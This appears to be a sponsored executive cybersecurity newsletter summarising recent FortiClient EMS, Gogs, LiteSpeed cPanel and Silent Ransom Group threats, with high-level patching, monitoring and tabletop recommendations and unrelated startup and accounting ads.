In partnership with
In the last ~48 hours, key cybersecurity developments require executive attention: FortiClient EMS exploitation delivering credential-stealing malware, a Gogs zero-day exposing self-hosted Git servers to remote code execution, an actively exploited LiteSpeed cPanel plugin flaw giving attackers root-level execution, and an FBI warning that Silent Ransom Group is targeting law firms with fake IT support calls and even in-person visits.
These developments reinforce priority themes for the weekend: management platforms are becoming malware delivery systems, developer infrastructure is a direct path to secrets and source code, hosting control planes remain high-value targets, and social engineering is moving beyond inboxes into phone calls, remote tools, and physical access attempts.
Are you running your business on incomplete numbers?
Most small business owners have financials, but few have financial clarity. There's a real difference between books that are technically up to date and books that actually tell you what's going on in your business right now. When accounting is reactive — updated when there's time, reviewed at tax season — you lose visibility exactly when you need it most. You can't tell which clients are truly profitable. You can't spot a cash flow gap before it becomes a crisis. BELAY's outsourced accounting team changes that.
Top-level takeaways this week:
Endpoint / Management Platforms ↑ — FortiClient EMS abuse shows attackers turning trusted endpoint administration into malware delivery.
Developer Infrastructure ↑ — Gogs RCE risk puts private repos, tokens, SSH keys, and source code directly in scope.
Hosting / Web Control Planes ↑ — LiteSpeed cPanel exploitation gives attackers root-level script execution on shared hosting environments.
Social Engineering / Data Extortion ↑ — Silent Ransom Group is blending phishing, fake IT support, remote access tools, cloud exfiltration, and physical office visits.
1) FortiClient EMS flaw exploited to push infostealer malware – High
What changed: Attackers are exploiting a critical FortiClient EMS vulnerability tracked as CVE-2026-35616 to deploy EKZ Infostealer through FortiClient-managed VPN scripting workflows. The activity abuses a trusted management path to push malicious PowerShell commands to managed endpoints.
Why this matters: FortiClient EMS is a management platform. If attackers can push scripts through it, they are not just compromising one endpoint. They are borrowing your own administration system to steal browser credentials, cookies, and user data at scale.
2) Gogs zero-day exposes self-hosted Git servers to RCE – High
What changed: A critical Gogs zero-day allows authenticated attackers to gain remote code execution through argument injection during pull-request rebase operations. Rapid7 warned that default configurations with open registration increase exposure, and exploitation can expose private repos, password hashes, API tokens, SSH keys, and 2FA secrets.
Why this matters: Self-hosted Git is not “just developer tooling.” It is source code, credentials, deployment logic, and operational memory. If attackers own it, they may inherit the instructions and keys needed to compromise everything downstream.
3) CISA: Four days to patch exploited LiteSpeed cPanel flaw – Medium-High
What changed: CISA ordered federal agencies to patch an actively exploited LiteSpeed cPanel plugin vulnerability tracked as CVE-2026-48172 by May 29. The flaw allows remote attackers with no privileges to execute arbitrary scripts with root privileges through incorrect privilege assignment.
Why this matters: Hosting control planes are blast-radius machines. A root-level issue in a cPanel plugin can turn one exposed server into customer data exposure, webshell deployment, credential theft, and a long weekend of “how many sites were on that box again?”
4) Silent Ransom Group targeting law firms with fake IT support – Medium-High
What changed: The FBI warned that Silent Ransom Group is targeting U.S. law firms with phishing, fake IT support calls, remote access tooling, and even in-person visits to steal sensitive data. The group relies on legitimate remote management tools and trusted cloud platforms like Google Drive and OneDrive to blend into normal operations.
Why this matters: This is social engineering with a field office. If attackers can convince staff to grant remote access, or physically show up and copy data to a USB drive, your “email security awareness training” is not enough. Charming. Also terrible.
Stage | Vector | What We’re Seeing |
|---|---|---|
Initial Access | Management platform exploitation | FortiClient EMS abuse used to push malicious scripts through trusted endpoint workflows |
Privilege / Persistence | Git server RCE | Gogs argument injection enabling command execution and repository compromise |
Control Plane Abuse | Hosting / cPanel exploitation | LiteSpeed plugin flaw enabling arbitrary script execution as root |
What happens when you throw out the GTM playbook
That investor was wrong. Gamma is now worth $2B, with 50M users and more than half their growth driven by word of mouth.
They're one of 6 AI-native startups in HubSpot for Startups' free Bold Bets Playbook. Replit grew revenue 50x after half the team pushed back on the strategy. Ramp generated 100M+ views from a single stunt. Clay's co-founder wouldn't hang up a sales call until the prospect DMed him in Slack.
Each one took a GTM risk most founders would never greenlight. Each one paid off.
🔄 Patch & Hardening
Patch FortiClient EMS and confirm CVE-2026-35616 remediation across all exposed management servers.
Review FortiClient EMS configuration for unexpected Remote Access Profile changes, certificate-authentication anomalies, and new administrative actions.
Restrict or disable open registration on Gogs and validate whether rebase-before-merge workflows are enabled.
Patch LiteSpeed WHM/cPanel plugin stacks and run vendor-recommended log checks for exploitation indicators.
Restrict remote access tools to approved admins, approved devices, and approved business workflows only.
🧑💻 People & Monitoring
Monitor FortiClient EMS activity for script execution, VPN policy changes, unfamiliar admin origins, and credential-stealer indicators.
Hunt Gogs activity for suspicious pull requests, malicious branch names, unexpected rebase operations, and repo access anomalies.
Watch cPanel/hosting logs for
redisAbleactivity, unexpected root-level script execution, and new web-accessible files.Train help desk and legal staff to challenge urgent IT-support calls, remote-access requests, and anyone physically requesting device access.
Monitor cloud exfil paths like Google Drive, OneDrive, Dropbox, and unmanaged file-transfer tools.
📋 Process
Enforce change freeze on endpoint management, Git hosting, cPanel/hosting platforms, and remote access tooling unless CISO-approved.
Conduct 30-minute tabletop:
“Fake IT support call → remote access tool installed → data exfiltration to cloud storage → extortion demand.”
🤝 Partners
Require MSP attestation for FortiClient EMS and LiteSpeed/cPanel patch status.
Require DevOps validation of Gogs exposure, registration settings, repo permissions, and secret rotation readiness.
Require legal/business unit confirmation that staff know how to validate IT support requests before granting remote or physical access.
Validate MSSP coverage for endpoint management abuse, Git server compromise, hosting control-plane abuse, and remote-tool exfiltration.
FortiClient EMS: Monitor for unexpected Remote Access Profile changes, suspicious VPN scripting activity, PowerShell execution from FortiClient-managed workflows, and browser credential access after policy pushes.
Gogs: Alert on new user registrations, suspicious pull requests, unusual branch names, rebase-before-merge activity, repo-wide access spikes, and unexpected outbound traffic from Git servers.
LiteSpeed / cPanel: Hunt for redisAble indicators, unexpected root-level script execution, newly created web-accessible files, unfamiliar source IPs, and sudden cPanel privilege changes.
Silent Ransom Group-style activity: Watch for remote access tool installs after help desk calls, unusual cloud uploads to Google Drive / OneDrive / Dropbox, suspicious USB activity, and reports of in-person IT support requests.
Overall Risk Level: High
This weekend’s highest-risk pattern is trusted-platform abuse:
Endpoint management platforms
Self-hosted Git systems
Hosting control panels
Remote access and cloud exfiltration workflows
Attackers are not just looking for vulnerable endpoints. They are targeting the systems your teams use to manage endpoints, host code, administer websites, and move data. In other words, the exact systems everyone assumes are “supposed to be doing that.”
Endpoint management platforms are Tier-0-adjacent systems.
Self-hosted Git servers are credential and source-code vaults, not side projects.
Hosting control planes can become root-level compromise engines.
Social engineering is no longer just email. It includes calls, remote tools, cloud storage, and physical presence.
🔄 Verify: FortiClient EMS, Gogs exposure controls, and LiteSpeed/cPanel remediation status.
📊 Validate: Monitoring coverage for management-platform abuse, Git server RCE, root-level script execution, and remote-access tooling.
💼 Confirm: Help desk and legal teams know how to validate IT-support requests before granting access.
🔹 Rehearse: “Trusted admin platform compromise → credential theft → cloud exfiltration → extortion response.”
Final Insight: Attackers are not just sneaking through the side door anymore.
They are showing up as your management console, your Git server, your hosting control panel, and occasionally “Dave from IT” with a clipboard.
Verify trust before it becomes evidence.
The GTM bets that shouldn't have worked, and did
One grew revenue 50x after half his team quit over the strategy. One brought in 50K signups in a single day with no paid budget. One generated 100M+ views from a stunt that took 50 hours to conceive. One asked every prospect to demo the product themselves instead of demoing it for them.
None of them followed the safe playbook. They treated GTM like an experiment, moved before they had proof, and made bets most founders would never get approved.
HubSpot for Startups documented all 6 stories in the free Bold Bets Playbook. The risks they took, why it was risky, and what it returned.
